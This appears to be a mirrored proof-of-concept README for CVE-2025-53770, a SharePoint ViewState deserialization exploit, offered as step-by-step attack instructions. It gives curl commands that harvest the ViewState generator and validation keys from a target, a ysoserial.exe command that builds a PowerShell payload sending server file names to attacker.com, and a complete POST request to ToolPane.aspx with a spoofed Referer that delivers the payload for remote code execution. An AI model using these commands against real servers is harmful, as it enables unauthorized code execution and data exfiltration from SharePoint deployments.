来源

关联漏洞

介绍

# CVE-2025-53770-Exploit

First, get the __VIEWSTATEGENERATOR, VALIDATION_KEY, VALIDATION_ALG value from the target SharePoint page:

```
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
curl https://target.com/_layouts/15/spinstall0.aspx
```

Then, create a PowerShell ViewState payload using ysoserial.exe that lists a directory on the server and sends the filenames to an external URL:
```
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify
```
Finally, add the generated token to a POST request like this to execute the command on the server:


```
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
```

文件快照

 [4.0K]  /data/pocs/2eacc9d09cd72d5bcce26e817db8800dc2d0c418
└── [1.5K]  README.md

0 directories, 1 file

备注